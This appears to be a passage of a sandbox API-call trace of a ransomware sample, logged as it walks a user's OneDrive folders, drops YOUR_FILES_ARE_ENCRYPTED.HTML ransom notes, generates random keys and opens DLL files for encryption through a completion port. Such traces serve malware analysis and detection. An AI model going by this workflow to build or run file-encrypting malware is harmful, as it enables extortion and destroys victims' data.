ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sw", cAlternateFileName="")) returned 1 [0162.515] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw") returned 74 [0162.515] GetProcessHeap () returned 0x270000 [0162.515] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.515] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw" [0162.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\*" [0162.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.516] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.516] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.516] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.516] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.516] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.516] lstrlenW (lpString=".mui") returned 4 [0162.516] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.516] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.516] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.516] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.517] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.519] CloseHandle (hObject=0x5ac) returned 1 [0162.520] GetProcessHeap () returned 0x270000 [0162.521] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.521] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4bce6d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4bce6d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4bce6d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2aaca0, dwReserved0=0x0, dwReserved1=0x60, cFileName="SyncEngine.dll", cAlternateFileName="SYNCEN~1.DLL")) returned 1 [0162.521] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll") returned 86 [0162.521] lstrcmpW (lpString1="SyncEngine.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.521] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0162.521] lstrlenW (lpString=".dll") returned 4 [0162.521] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0162.521] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\syncengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0162.522] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=2796704) returned 1 [0162.522] GetProcessHeap () returned 0x270000 [0162.522] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.523] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A8") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="EA") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="40") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="AF") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F3") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="B2") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="74") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="20") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="52") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="6B") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="FB") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C4") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D0") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="2B") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="DC") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="47") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="DF") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="3F") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="22") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="13") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="36") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EE") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9D") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="94") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="9E") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="62") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="49") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="96") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="30") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="E1") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="91") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="43") returned 2 [0162.525] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll" [0162.525] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.525] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.726] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ta", cAlternateFileName="")) returned 1 [0162.728] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta") returned 74 [0162.728] GetProcessHeap () returned 0x270000 [0162.729] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.729] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta" [0162.729] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\*" [0162.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x142a8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.831] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.831] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.831] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.831] lstrlenW (lpString=".mui") returned 4 [0162.832] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.832] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x142a8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.832] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.832] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ta\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.833] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.835] CloseHandle (hObject=0x5ac) returned 1 [0162.836] GetProcessHeap () returned 0x270000 [0162.837] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.837] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="te", cAlternateFileName="")) returned 1 [0162.837] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te") returned 74 [0162.837] GetProcessHeap () returned 0x270000 [0162.837] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.838] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te" [0162.838] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\*" [0162.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.838] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.838] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.838] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.838] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.839] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.839] lstrlenW (lpString=".mui") returned 4 [0162.839] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.839] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.839] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.839] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\te\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.840] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.842] CloseHandle (hObject=0x5ac) returned 1 [0162.843] GetProcessHeap () returned 0x270000 [0162.843] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.843] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4dbd8b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4dbd8b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4dbd8b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x754a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="Telemetry.dll", cAlternateFileName="TELEME~1.DLL")) returned 1 [0162.844] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\Telemetry.dll") returned 85 [0162.844] lstrcmpW (lpString1="Telemetry.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.844] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0162.844] lstrlenW (lpString=".dll") returned 4 [0162.844] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0162.844] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\Telemetry.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\telemetry.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0162.844] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabaa4730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabaa4730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tg", cAlternateFileName="")) returned 1 [0162.844] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tg") returned 74 [0162.844] GetProcessHeap () returned 0x270000 [0162.844] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.844] lstrcpyW (in: lpString1=0x74d2010, 